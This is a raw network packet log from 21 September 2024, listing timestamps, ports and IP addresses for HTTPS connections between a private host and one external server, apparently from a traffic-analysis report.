Sep 21, 2024 18:51:39.588433981 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.605541945 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.605566025 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.605612993 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.605628014 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.605642080 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.605664015 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.629838943 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.629868031 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.629908085 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.629920006 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.629945040 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.629962921 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.632556915 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.632603884 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.632632971 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.632641077 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.632664919 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.632677078 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.645375013 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.645397902 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.645448923 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.645459890 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.645489931 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.645509005 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.653311968 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.653330088 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.653398037 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.653428078 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.653474092 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.670866013 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.670888901 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.670964003 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.670979977 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.671020985 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.673089027 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.673110008 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.673181057 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.673191071 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.673237085 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.674523115 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.674544096 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.674614906 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.674623966 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.674662113 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.717012882 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.717065096 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.717117071 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.717130899 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.717148066 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.717175961 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.718913078 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.718951941 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.718996048 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.719003916 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.719033957 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.719049931 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.721201897 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.721256971 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.721287966 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.721296072 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.721328020 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.721353054 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.731965065 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.732007980 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.732043028 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.732053995 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.732083082 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.732100964 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.741554022 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.741600037 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.741650105 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.741660118 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.741694927 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.741704941 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.757800102 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.757839918 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.757890940 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.757908106 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.757926941 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.757951021 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.759999037 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.760040045 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.760072947 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.760088921 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.760109901 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.760132074 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.762058973 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.762099028 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.762125969 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.762132883 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.762156010 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.762176991 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.801841021 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.801862955 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.801956892 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.801986933 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.802035093 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.803570986 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.803591013 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.803627968 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.803636074 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.803667068 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.803678036 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.817601919 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.817632914 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.817672968 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.817686081 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.817708969 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.817724943 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.827028036 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.827049971 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.827102900 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.827115059 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.827143908 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.827152967 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.829070091 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.829088926 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.829142094 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.829149961 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.829178095 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.829197884 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.844830036 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.844890118 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.844943047 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.844950914 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.844983101 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.845009089 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.847235918 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.847275972 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.847311020 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.847318888 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.847347975 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.847357988 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.866127014 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.866153955 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.866254091 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.866266012 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.866311073 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.889539957 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.889564991 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.889626026 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.889638901 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.889676094 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.889693975 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.891726017 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.891757965 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.891794920 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.891803026 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.891828060 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.891850948 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.904486895 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.904510975 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.904565096 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.904578924 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.904617071 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.904633045 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.914073944 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.914119005 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.914154053 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.914166927 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.914210081 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.914232969 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.916032076 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.916050911 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.916091919 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.916100025 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.916131020 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.916152000 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.365586996 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.365601063 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.365681887 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.365711927 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.365775108 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.367974997 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.367994070 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.368130922 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.368130922 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.368165970 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.368222952 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.377053022 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.377094984 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.377151966 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.377182007 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.377233028 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.379002094 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.379040956 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.379096985 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.379107952 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.379149914 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.383860111 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.383877993 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.383925915 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.383960009 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.383980989 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.384005070 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.386400938 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.386419058 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.386563063 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.386594057 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.386656046 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.388438940 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.388457060 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.388501883 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.388515949 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.388534069 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.388552904 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.390785933 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.390805960 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.390856028 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.390866041 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.391087055 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.407486916 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.407543898 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.407603979 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.407634020 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.407658100 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.407675028 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.409924984 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.409944057 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.410027027 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.410037041 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.410188913 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.411649942 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.411669016 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.411710978 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.411720037 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.411736965 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.411760092 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.414339066 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.414356947 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.414410114 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.414422989 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.414465904 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.416536093 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.416553974 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.416606903 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.416615963 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.416654110 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.420404911 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.420437098 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.420490980 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.420500994 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.420536041 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.420547009 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.420552969 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.420589924 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.424596071 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.424613953 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.447050095 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.447107077 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:40.447204113 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.447447062 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:40.447463989 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:41.307879925 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:41.307984114 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:41.308568954 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:41.308589935 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:41.310733080 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:41.310739040 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:41.310785055 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:41.310794115 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:41.550863028 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:41.550951958 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:41.551035881 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:41.551337004 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:41.551352024 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.314215899 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.314353943 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.318705082 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.318733931 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.321511030 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.321523905 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.321564913 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.321584940 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.421061039 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.421153069 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.421184063 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.421230078 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.421236992 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.421282053 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.441569090 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.441603899 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.611098051 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.611145973 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:42.611243963 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.611557007 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:42.611576080 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.159337997 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.159446955 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.159507036 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.159543037 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.159573078 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.159604073 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.160782099 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.160816908 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.372548103 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.372649908 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.373158932 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.373173952 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.374946117 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.374962091 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.713594913 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.713665009 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:43.713761091 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.714015961 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:43.714034081 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.544387102 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.544487953 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.544518948 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.544553995 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.544585943 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.544625044 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.545526981 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.545557022 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.546205044 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.546350956 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.546726942 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.546737909 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.548697948 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.548710108 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.751298904 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.751405001 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:44.751532078 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.751811028 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:44.751838923 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:45.456695080 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:45.456964970 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:45.457560062 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:45.457568884 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:45.459364891 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:45.459371090 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:45.704430103 CEST	443	49750	116.203.165.127	192.168.2.4
